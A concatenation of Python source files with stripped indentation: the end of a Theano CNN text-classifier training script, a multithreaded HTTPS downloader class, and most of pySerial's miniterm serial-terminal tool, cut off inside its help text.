#test_loss = test_model_all(test_set_x,test_set_y)
#test_perf = 1- test_loss
print "n_test_batches: ", n_test_batches
test_losses = [real_test_model(i) for i in xrange(n_test_batches)]
#test_losses = [real_test_model(0)]
test_perf = 1 - np.mean(test_losses)
print "label ", label,
print (' test perf: %.2f %%' % (test_perf*100.))
#val_sig = [val_output_sigmoid(i) for i in xrange(n_val_batches)]
#print val_sig
#test_y_pred_cur = test_model_all_3(test_set_x)
#test_y_final_layer = test_model_final_layer(test_set_x)
#test_y_pred_cur = [test_model_all_3(i) for i in xrange(n_test_batches)]
#test_y_final_layer = [test_model_final_layer(i) for i in xrange(n_test_batches)]
#test_final_layer = ""
start_time = time.time()
print "outputting test result..."
#output_test = open("multi_classifiers/mr_folder/true_and_pred_value" + str(label), 'w')
output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/true_and_pred_value" + str(label), 'w')
if best_val_perf != 0:
for i in xrange(n_test_batches):
test_y_pred_cur = test_model_all_3(i)
test_y_final_layer = test_model_final_layer(i)
#print "i: ", i
if i != n_test_batches - 1:
for j in range(0, batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
output_test.write(str(test_y[i * batch_size + j]) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
else:
for j in range(0, datasets[1].shape[0] % batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
output_test.write(str(test_y[i * batch_size + j]) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
output_test.close()
#return test_perf
else:
output_test.close()
#return 0
parallel_num = 10 # parallel number, actual parallel threads will be 11
parallel_batch_size = cand_n_test_batches / parallel_num
processV = []
for parallel_id in range(0, parallel_num + 1):
processV.append(Process(target = cand_output, args = ( parallel_id, parallel_num, parallel_batch_size, type, iteration_i, label, best_val_perf, cand_n_test_batches, \
cand_test_model_all_3, cand_test_model_final_layer, batch_size, cand_test_y, datasets[2].shape[0], )))
for parallel_id in range(0, parallel_num + 1):
processV[parallel_id].start()
for parallel_id in range(0, parallel_num + 1):
processV[parallel_id].join()
cand_output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label), 'w')
for i in range(0, parallel_num + 1):
parallel_id = str(i)
f = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label) + '_' + parallel_id, 'r')
for line in f:
cand_output_test.write(line)
f.close()
cand_output_test.close()
print "testing time: ", time.time()-start_time
#cand_output(parallel_id, parallel_size, type, iteration_i, label, best_val_pref, cand_n_test_batches, \
#cand_test_model_all_3, cand_test_model_final_layer, batch_size, cand_test_y, datasets[2].shape[0])
"""
cand_output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label), 'w')
if best_val_perf != 0:
for i in xrange(cand_n_test_batches):
cand_test_y_pred_cur = cand_test_model_all_3(i)
cand_test_y_final_layer = cand_test_model_final_layer(i)
#print "i: ", i
if i != cand_n_test_batches - 1:
for j in range(0, batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
else:
for j in range(0, datasets[2].shape[0] % batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.close()
print "testing time: ", time.time()-start_time
return test_perf
else:
cand_output_test.close()
print "testing time: ", time.time()-start_time
return 0
"""
"""
for i in range(test_set_y.shape[0]):
output_test.write( str(test_set_y[i]) + '\t' + str(test_y_pred_cur[i])+ '\t' + str(test_y_final_layer[i] ) + '\n')
"""
"""
# save the final classifier
with open('trained_CNN.pkl', 'w') as f:
cPickle.dump(classifier, f)
"""
return test_perf
def shared_dataset(data_xy, borrow=True):
""" Function that loads the dataset into shared variables
The reason we store our dataset in shared variables is to allow
Theano to copy it into the GPU memory (when code is run on GPU).
Since copying data into the GPU is slow, copying a minibatch everytime
is needed (the default behaviour if the data is not in a shared
variable) would lead to a large decrease in performance.
"""
data_x, data_y = data_xy
shared_x = theano.shared(np.asarray(data_x,
dtype=theano.config.floatX),
borrow=borrow)
shared_y = theano.shared(np.asarray(data_y,
dtype=theano.config.floatX),
borrow=borrow)
return shared_x, T.cast(shared_y, 'int32')
def sgd_updates_adadelta(params,cost,rho=0.95,epsilon=1e-6,norm_lim=9,word_vec_name='Words'):
"""
adadelta update rule, mostly from
https://groups.google.com/forum/#!topic/pylearn-dev/3QbKtCumAW4 (for Adadelta)
"""
updates = OrderedDict({})
exp_sqr_grads = OrderedDict({})
exp_sqr_ups = OrderedDict({})
gparams = []
for param in params:
empty = np.zeros_like(param.get_value())
exp_sqr_grads[param] = theano.shared(value=as_floatX(empty),name="exp_grad_%s" % param.name)
gp = T.grad(cost, param)
exp_sqr_ups[param] = theano.shared(value=as_floatX(empty), name="exp_grad_%s" % param.name)
gparams.append(gp)
for param, gp in zip(params, gparams):
exp_sg = exp_sqr_grads[param]
exp_su = exp_sqr_ups[param]
up_exp_sg = rho * exp_sg + (1 - rho) * T.sqr(gp)
updates[exp_sg] = up_exp_sg
step = -(T.sqrt(exp_su + epsilon) / T.sqrt(up_exp_sg + epsilon)) * gp
updates[exp_su] = rho * exp_su + (1 - rho) * T.sqr(step)
stepped_param = param + step
if (param.get_value(borrow=True).ndim == 2) and (param.name!='Words'):
col_norms = T.sqrt(T.sum(T.sqr(stepped_param), axis=0))
desired_norms = T.clip(col_norms, 0, T.sqrt(norm_lim))
scale = desired_norms / (1e-7 + col_norms)
updates[param] = stepped_param * scale
else:
updates[param] = stepped_param
return updates
def as_floatX(variable):
if isinstance(variable, float):
return np.cast[theano.config.floatX](variable)
if isinstance(variable, np.ndarray):
return np.cast[theano.config.floatX](variable)
return theano.tensor.cast(variable, theano.config.floatX)
def safe_update(dict_to, dict_from):
"""
re-make update dictionary for safe updating
"""
for key, val in dict(dict_from).iteritems():
if key in dict_to:
raise KeyError(key)
dict_to[key] = val
return dict_to
def get_idx_from_sent(sent, word_idx_map, max_l=51, k=300, filter_h=5):
"""
Transforms sentence into a list of indices. Pad with zeroes.
"""
x = []
pad = filter_h - 1
for i in xrange(pad):
x.append(0)
words = sent.split()
for word in words:
if word in word_idx_map:
x.append(word_idx_map[word])
while len(x) < max_l+2*pad:
x.append(0)
return x
def make_idx_data_cv(revs, word_idx_map, cv, max_l=51, k=300, filter_h=5):
"""
Transforms sentences into a 2-d matrix.
"""
train, test, candidate_test = [], [], []
for rev in revs:
sent = get_idx_from_sent(rev["text"], word_idx_map, max_l, k, filter_h)
sent.append(rev["y"])
"""
if rev["split"]==cv:
test.append(sent)
else:
train.append(sent)
"""
if rev["split"]== 0:
test.append(sent)
elif rev["split"]== 1:
train.append(sent)
elif rev["split"]== 2:
candidate_test.append(sent)
train = np.array(train,dtype="int")
test = np.array(test,dtype="int")
candidate_test = np.array(candidate_test,dtype="int")
return [train, test, candidate_test]
#if __name__=="__main__":
def CNN(iteration_i, type, argv1, argv2, index):
print "type: ", type
print "loading data...",
x1 = cPickle.load(open("mr_folder_" + type + "_event_words/" + iteration_i + "/mr" + str(index) + ".p","rb"))
#x1 = cPickle.load(open("mr_folder_" + type + "_event_words/mr_test" + str(index) + ".p","rb"))
#x1 = cPickle.load(open("multi_classifiers/mr_folder/mr" + str(index) + ".p","rb"))
#x1 = cPickle.load(open("multi_classifiers/mr_folder/mr_test.p" ,"rb"))
revs, W, W2, word_idx_map, vocab = x1[0], x1[1], x1[2], x1[3], x1[4]
print "data loaded!"
#mode= sys.argv[1]
#word_vectors = sys.argv[2]
mode= argv1
word_vectors = argv2
if mode=="-nonstatic":
print "model architecture: CNN-non-static"
non_static=True
elif mode=="-static":
print "model architecture: CNN-static"
non_static=False
execfile("../model/conv_net_classes.py")
if word_vectors=="-rand":
print "using: random vectors"
U = W2
elif word_vectors=="-word2vec":
print "using: word2vec vectors"
U = W
results = []
r = range(0,1)
for i in r:
datasets = make_idx_data_cv(revs, word_idx_map, i, max_l=56,k=300, filter_h=5)
perf = train_conv_net(iteration_i, type, index, datasets,
U,
lr_decay=0.95,
filter_hs=[5],
conv_non_linear="relu",
hidden_units=[100,3],
shuffle_batch=True,
n_epochs = 3,
sqr_norm_lim=9,
non_static=non_static,
batch_size=100,
dropout_rate=[0.5],
)
print "cv: " + str(i) + ", perf: " + str(perf)
results.append(perf)
print str(np.mean(results))
def conv_net_sentence2_main(iteration_i, type, cluster_num):
#if __name__=="__main__":
# iteration_i = '1'
# cluster_num = 1
processV = []
for i in range(0, cluster_num):
processV.append(Process(target = CNN, args = (iteration_i, type, "-static", "-word2vec", str(i), )))
for i in range(0, cluster_num):
processV[i].start()
for i in range(0, cluster_num):
processV[i].join()
|
globus_https.py
|
import os
import time
import requests
import tempfile
import threading
from queue import Queue
class GlobusHttpsDownloader:
def __init__(self, download_type="file", in_tmpdir=False):
self.download_type = download_type
self.orig_dir = os.getcwd()
if in_tmpdir:
self.new_dir = tempfile.mkdtemp()
else:
self.new_dir = self.orig_dir
# TODO: should really use the built-ins for these (from base.py class)
self.success_files = []
self.fail_files = []
def fetch(self, remote_filepath, headers, rel_loc_path):
try:
req = requests.get(remote_filepath, headers=headers)
except Exception as e:
self.fail_files.append(remote_filepath)
raise Exception(f"[Xtract] Unable to fetch HTTPS file. Caught: {e}")
head, tail = os.path.split(rel_loc_path)
actual_directory = os.path.join(self.new_dir, head)
actual_full_file_path = os.path.join(actual_directory, tail)
os.makedirs(actual_directory, exist_ok=True)
with open(actual_full_file_path, 'wb') as f:
f.write(req.content)
self.success_files.append({'remote_path': remote_filepath, 'local_path': actual_full_file_path})
def batch_fetch(self, remote_filepaths, num_threads=2):
"""
:param remote_filepaths (tuple) of form (remote_filepath, local_filepath, headers)
:param headers:
:param num_threads:
:return: None (put onto self.success_queue)
"""
q = Queue()
for filepath in remote_filepaths:
q.put(filepath)
num_threads = max(num_threads, len(remote_filepaths))
# e.g., if there are fewer files than max_threads, we would have idle threads -- hence, THIS!
total_thread_counter = 0
num_active_threads = 0
all_thread_ls = []
active_thread_queue = Queue()
while not q.empty():
if num_active_threads < num_threads:
remote_filepath, local_filename, headers = q.get()
thr = threading.Thread(target=self.fetch, args=(remote_filepath, headers, local_filename))
total_thread_counter += 1
num_active_threads += 1
thr.start()
active_thread_queue.put(thr)
all_thread_ls.append(thr)
new_spots = 0
for i in range(num_active_threads):
thr = active_thread_queue.get()
if thr.is_alive():
active_thread_queue.put(thr)
else:
num_active_threads -= 1
new_spots = 1
# Avoid cycling the CPU by sleeping for brief period if nothing has progressed.
if new_spots == 0:
time.sleep(0.5) # TODO: Taking suggestions for better ways of avoiding CPU cycling.
for thr in all_thread_ls:
thr.join()
|
miniterm.py
|
#!/home/Prinzessin/mesh/zucc/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
